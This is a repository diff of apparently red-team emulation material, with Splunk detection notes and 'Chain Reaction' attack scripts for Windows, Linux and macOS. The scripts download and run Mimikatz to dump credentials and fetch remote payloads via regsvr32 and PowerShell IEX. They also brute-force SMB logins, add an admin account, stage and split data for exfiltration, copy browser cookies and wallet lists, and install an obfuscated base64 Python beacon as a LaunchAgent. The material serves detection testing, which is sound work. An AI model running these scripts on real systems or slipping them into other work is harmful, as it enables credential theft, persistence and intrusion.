ARTifacts/Atomic_Friday/2020-05-01/Getting_Lateral.md
Executable
+59
View File
@@ -0,0 +1,59 @@
# Getting Lateral
Using DetectionLab, we will enable [PSRemoting](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7) on our remote host WEF and execute our Atomic Test on it.
## Setup
On WEF
```
Enable-PSRemoting
```
On Win10
Same terminal we used earlier:
`$sess = New-PSSession -ComputerName wef -Credential windomain.local\administrator`
Prompt for credentials
## Let's get Remote (execution)
Wiki - https://github.com/redcanaryco/invoke-atomicredteam/wiki/Execute-Atomic-Tests-(Remote)
After you have established the PS session ($sess) you can proceed with test execution as follows.
`Invoke-AtomicTest T1117 -TestNumbers 2 -ShowDetails`
`Invoke-AtomicTest T1003 -TestNumbers 4 -ShowDetails`
### Install any required prerequisites on the remote machine before test execution
`Invoke-AtomicTest T1117 -Session $sess -GetPrereqs`
### execute all atomic tests in technique T1117|T1003 on a remote machine
`Invoke-AtomicTest T1117 -Session $sess -TestNumbers 2`
`Invoke-AtomicTest T1003 -TestNumbers 4 -Session $sess`
## Validate execution
[T1117 Splunk](https://192.168.38.105:8000/en-US/app/search/search?q=search%20host%3Dwef*%20regsvr32.exe%20earliest%3D-30m%20latest%3Dnow&display.page.search.mode=smart&dispatch.sample_ratio=1&workload_pool=&earliest=-24h%40h&latest=now&sid=1588276958.707)
[T1003 Splunk](https://192.168.38.105:8000/en-US/app/search/search?q=search%20host%3Dwef*%20reg.exe%20earliest%3D-30m%20latest%3Dnow%20%7C%20stats%20values(Process_Command_Line)&display.page.search.mode=smart&dispatch.sample_ratio=1&workload_pool=&earliest=-24h%40h&latest=now&sid=1588277661.75&display.page.search.tab=statistics&display.general.type=statistics)
## Random Tips
- Add user to "Remote management Users" group.
- Enabling PowerShell remoting on client versions of Windows when the computer is on a public network is normally disallowed, but you can skip this restriction by using the SkipNetworkProfileCheck parameter. For more information, see the description of the SkipNetworkProfileCheck parameter.
- psremoting to a Windows Server will require an Administrator account (I used Administrator above, as example shown)
## Reference
- PSRemoting - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7
ARTifacts/Atomic_Friday/2020-06-05/Atomic_Friday.md
+112
View File
@@ -0,0 +1,112 @@
# Atomic Friday - 06-05-2020
Detection Engineering Philosophy in a nutshell
- https://twitter.com/mattifestation/status/1263416936517468167?s=20
Additional References:
- https://posts.specterops.io/detection-spectrum-198a0bfb9302
- https://posts.specterops.io/detection-in-depth-a2392b3a7e94
## Do it live
What data do I have?
```
| metadata type=sourcetypes index=botsv3 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
```
Stats
Endpoint count
- `(index="botsv3" OR index="botsv2") | stats values(ComputerName)`
Event types
- `(index="botsv3" OR index="botsv2") | stats values(type)`
```
(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-Sysmon/Operational" | stats values(CommandLine) by Computer
```
## Technique: Scheduled Tasks
- MITRE [T1053](https://attack.mitre.org/techniques/T1053/)
- Atomic Red Team [T1053](https://github.com/redcanaryco/atomic-red-team/blob/7d07686f600c0fb3bba468c987eb4e4faea83fa9/atomics/T1053/T1053.md)
Find all Schtasks:
`(index="botsv3" OR index="botsv2") schtasks.exe`
What data sources did we receive?
### Now let's see all the CommandLine?
`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine)`
`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine) by Computer`
`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine) by host`
### Change source (WinEventLog:Security)
`(index="botsv3") source="WinEventLog:Security" schtasks.exe | stats values(Process_Command_Line) by Creator_Process_Name`
`(index="botsv2") source="WinEventLog:Security" schtasks.exe | stats values(Process_Command_Line) by ComputerName`
### What created this?
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe | stats values(Image) by ParentImage`
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe ParentImage=*\\powershell.exe| stats values(Image) by ParentImage ParentCommandLine`
### Begin Tuning Schtasks Search
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*powershell.exe*| stats values(CommandLine) by Computer`
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" | stats values(CommandLine) by Computer`
but - because we know what we want to fire on -
We can target:
- `*frombase64string*`
- `http*`
- `powershell*`
I want to alert on each time someone creates a task:
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | stats values(CommandLine) by Computer`
There is a whole list of things we target. But, first gathering scheduled tasks in a report helps us identify a baseline.
### Saved Reports
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | stats values(CommandLine) by Computer`
### Prep for alert:
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe | table Computer, User, CommandLine, _time`
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | table Computer, User, CommandLine, _time`
## Technique: Powershell
Sometimes we may not see the whole picture looking at process command line (Sysmon). What if we had Powershell transactions logs?
`(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-PowerShell/Operational"`
Sysmon -
`(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-Sysmon/Operational" | stats values(CommandLine) by Computer`
### Alerts
Email alerts:
Save “Saved Search” with (or change) for a “clean” alert:
`| table Computer, User, CommandLine, _time`
Recommend throttling each alert by current estimated time to remediation.
Ex - Throttle 3 days
ARTifacts/Atomic_Friday/README.md
+1
View File
@@ -0,0 +1 @@
Notes, resources, and errata related to Atomic Friday events.
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
atomics/T1005/src/gta.db → ARTifacts/Chain_Reactions/atomic-hello
Regular → Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
ARTifacts/Chain_Reactions/atomic-hello.cs
+13
View File
@@ -0,0 +1,13 @@
using System;
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe atomic-hello.cs
// Expected Output: Hello from Atomic Red Team! \n Press Enter To Close.
public class Program
{
public static void Main()
{
Console.WriteLine("Hello from Atomic Red Team! \n Press Enter To Close.");
Console.ReadLine();
}
}
ARTifacts/Chain_Reactions/atomic-hello.exe
BIN
View File
Binary file not shown.
atomics/T1005/src/art → ARTifacts/Chain_Reactions/atomic-hello.macos
Regular → Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+105
View File
@@ -0,0 +1,105 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hide Artifacts: Hidden Files and Directories https://attack.mitre.org/techniques/T1564/001/
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Software Discovery: Security Software Discovery https://attack.mitre.org/techniques/T1518/001/
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Archive Collected Data: Archive via Library https://attack.mitre.org/techniques/T1560/002/
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File Indicator Removal on Host: File Deletion https://attack.mitre.org/techniques/T1070/004/
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1560.002 - Archive Collected Data: Archive via Library
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1543.001 - Create or Modify System Process: Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222.002 - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1071.001 - Application Layer Protocol: Web Protocols
#
